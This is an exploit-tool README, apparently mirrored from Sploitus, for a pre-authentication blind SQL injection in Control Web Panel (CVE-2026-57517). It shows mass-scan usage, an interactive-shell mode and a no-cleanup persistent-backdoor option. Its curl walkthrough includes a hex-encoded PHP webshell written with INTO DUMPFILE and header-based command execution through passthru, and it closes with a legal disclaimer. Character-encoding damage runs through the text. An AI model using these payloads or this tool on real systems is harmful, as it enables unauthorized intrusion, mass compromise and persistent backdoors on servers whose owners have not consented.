Share
## https://sploitus.com/exploit?id=AB794952-8E2E-55F8-97FF-1DE1AB6E3835
Control Web Panel ≤ 0.9.8.1224 โ€” Blind SQL Injection to Remote Code Execution
Port 2083 โ†’ userRes POST โ†’ INTO DUMPFILE โ†’ Port 2031 Webshell โ†’ cwpsvc



---

## ๐Ÿ”ด Vulnerability Overview

**CVE-2026-57517** is a critical pre-authentication blind SQL injection in **Control Web Panel (CWP)** versions โ‰ค 0.9.8.1224. The `userRes` POST parameter at the user panel endpoint is not sanitized before being embedded in an SQL query. Queries execute with **MySQL root** privileges โ€” which holds the global `FILE` privilege โ€” allowing attackers to write arbitrary files via `INTO DUMPFILE`.

The typical exploitation chain deploys a PHP webshell to the web-accessible Roundcube logs directory, achieving remote code execution as the `cwpsvc` service account.

| Field | Detail |
|---|---|
| **CVE** | CVE-2026-57517 |
| **CVSS** | 9.8 (Critical) โ€” `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **Type** | CWE-89 โ€” Blind SQL Injection (Pre-Auth) |
| **Affected** | Control Web Panel โ‰ค 0.9.8.1224 |
| **Fixed** | Version 0.9.8.1225 |
| **Disclosure** | July 1, 2026 |
| **Researcher** | Egidio Romano (Karma In Security) |
| **PoC** | Public โ€” [KIS-2026-12](https://karmainsecurity.com/KIS-2026-12) |

---

## ๐Ÿ“ฆ Installation

```bash
git clone https://github.com/shinthink/CVE-2026-57517.git
cd CVE-2026-57517
pip install -r requirements.txt
```

---

## ๐Ÿ“– Usage

```bash
# Single target (auto-detect username)
python cve_2026_57517.py -t 192.168.1.100

# Single target with known username
python cve_2026_57517.py -t 192.168.1.100 -u cwpsvc

# Mass scan
python cve_2026_57517.py -f targets.txt -o live.txt

# Interactive shell
python cve_2026_57517.py -t target.com --rce -u cwpsvc

# Persistent backdoor (no auto-cleanup)
python cve_2026_57517.py -t target.com --no-cleanup
```

```
  -t, --target      Single target host
  -f, --file        File with targets (one per line)
  -u, --username    CWP username (skips auto-detection)
  -o, --output      Live TXT output file
  --json            JSON report file
  --threads         Concurrent workers (default: 20)
  --timeout         Request timeout seconds (default: 15)
  --no-cleanup      Leave shells on target
  --rce             Interactive shell mode
  -v, --verbose     Verbose output
```

---

## ๐Ÿงช Proof of Concept

### Scenario 1: Mass Scan

```bash
$ python cve_2026_57517.py -f targets.txt -o live.txt -v
```

```
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  CVE-2026-57517 | 5 targets | 20 threads
  Cleanup: yes
  Live TXT: live.txt
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€

  โœ… 192.168.10.100:2083  [rce_confirmed]  18.2s
     User  : admin
     Shell : https://192.168.10.100:2031/roundcube/logs/cwp_a3f2b9c1d8e4.php
     RCE   : uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)
             cwp-prod-01.example.com
     whoami: cwpsvc

  โš ๏ธ 192.168.10.200:2083  [sqli_failed]  12.1s
     User  : cwpsvc
     Error : SQL injection failed โ€” target may be patched or path not writable

  ยท 192.168.10.50:2083  [not_cwp]  2.3s

==================================================
  SCAN SUMMARY
==================================================
  Total      : 5
  โœ… RCE      : 2
  โš ๏ธ  SQLi Fail : 1
  ๐Ÿ” No User  : 1
  ยท  Not CWP  : 1
==================================================
```

### Scenario 2: Interactive Shell

```bash
$ python cve_2026_57517.py -t target.com --rce -u admin
```

```
  CWP Interactive Shell โ€” target.com
  Type 'exit' to quit, 'cleanup' to remove shell

cwp$ id
uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)

cwp$ hostname
cwp-prod-01

cwp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
cwpsvc:x:1001:1001::/home/cwpsvc:/bin/bash

cwp$ exit
```

### Scenario 3: Manual Reproduction (curl)

**Step 1 โ€” Verify CWP is reachable on port 2083**
```bash
curl -sk 'https://target.com:2083/' | grep -i 'control web panel\|CWP'
```

**Step 2 โ€” Validate username**
```bash
curl -sk -o /dev/null -w "%{http_code}" 'https://target.com:2083/admin/'
# 200 = user exists
```

**Step 3 โ€” SQL injection via userRes**

The payload uses a 13-column UNION SELECT with a hex-encoded PHP shell written via `INTO DUMPFILE`:

```sql
" UNION SELECT 1,0x{HEX_PHP_SHELL},3,4,5,6,7,8,9,10,11,12,13
INTO DUMPFILE '/usr/local/cwpsrv/var/services/roundcube/logs/shell.php' #
```

```bash
# The tool handles hex encoding automatically. Manual equivalent:
PAYLOAD='" UNION SELECT 1,0x3c3f706870206576616c286261736536345f6465636f646528245f5345525645525b22485454505f43225d29293b203f3e,3,4,5,6,7,8,9,10,11,12,13 INTO DUMPFILE '\''/usr/local/cwpsrv/var/services/roundcube/logs/shell.php'\'' #'

curl -sk 'https://target.com:2083/admin/' \
  -d "userRes=$PAYLOAD"
```

**Step 4 โ€” Execute commands via webshell (port 2031)**

The deployed PHP shell reads commands from the `C:` HTTP header:

```php

```

```bash
# Base64-encode: print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';
PHP=$(echo "print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';" | base64 -w0)

curl -sk 'https://target.com:2031/roundcube/logs/shell.php' -H "C: $PHP"
# uid=1001(cwpsvc) gid=1001(cwpsvc)
```

### Payload Breakdown

| Component | Value |
|---|---|
| **SQL columns** | 13-column UNION SELECT |
| **PHP shell** | `` |
| **Hex encoding** | MySQL `0x...` hex literal |
| **Write method** | `INTO DUMPFILE` (binary-exact file write) |
| **Target path** | `/usr/local/cwpsrv/var/services/roundcube/logs/{uniqid}.php` |
| **Command delivery** | HTTP header `C:` with base64-encoded PHP |
| **Command executor** | `passthru(base64_decode('{cmd}'))` |

---

## โš ๏ธ Disclaimer

> ### ๐Ÿšจ FOR EDUCATIONAL & AUTHORIZED TESTING PURPOSES ONLY
>
> This software is provided **solely for educational purposes** and **legitimate security research**. It is intended to be used by:
>
> - ๐Ÿ›ก๏ธ **Security professionals** conducting authorized penetration tests
> - ๐Ÿข **Organizations** auditing their own CWP infrastructure
> - ๐Ÿ”ฌ **Researchers** studying vulnerability exploitation techniques
> - ๐ŸŽ“ **Students** learning about web application security
>
> ### โŒ You may NOT use this software to:
>
> - Access computer systems **without explicit written authorization**
> - Compromise, damage, or disrupt systems you do not **own**
> - Engage in **illegal activity** of any kind
>
> ### โš–๏ธ Legal Notice
>
> Unauthorized access to computer systems violates laws including but not limited to:
> - **United States:** Computer Fraud and Abuse Act (18 U.S.C. ยง 1030)
> - **Indonesia:** UU ITE Pasal 30 & 46 (UU No. 11 Tahun 2008 jo. UU No. 1 Tahun 2024)
> - **European Union:** Directive 2013/40/EU
> - **United Kingdom:** Computer Misuse Act 1990
>
> **The author(s) assume NO LIABILITY for any misuse, damage, or legal consequences resulting from the use of this tool. By using this software, you acknowledge that you are solely responsible for your actions and agree to comply with all applicable laws.**

---

## ๐Ÿ“š References

| Resource | Link |
|---|---|
| Karma In Security Advisory | [KIS-2026-12](https://karmainsecurity.com/KIS-2026-12) |
| Original PoC | [CVE-2026-57517.php](https://karmainsecurity.com/pocs/CVE-2026-57517.php) |
| Full Disclosure | [SecLists](https://seclists.org/fulldisclosure/2026/Jul/9) |
| OpenCVE | [CVE-2026-57517](https://app.opencve.io/cve/CVE-2026-57517) |
| CWP Changelog | [control-webpanel.com](https://control-webpanel.com/changelog) |

---


  โšก Built for security research & education โšก
  
  This project is not affiliated with Control Web Panel or the Apache Software Foundation.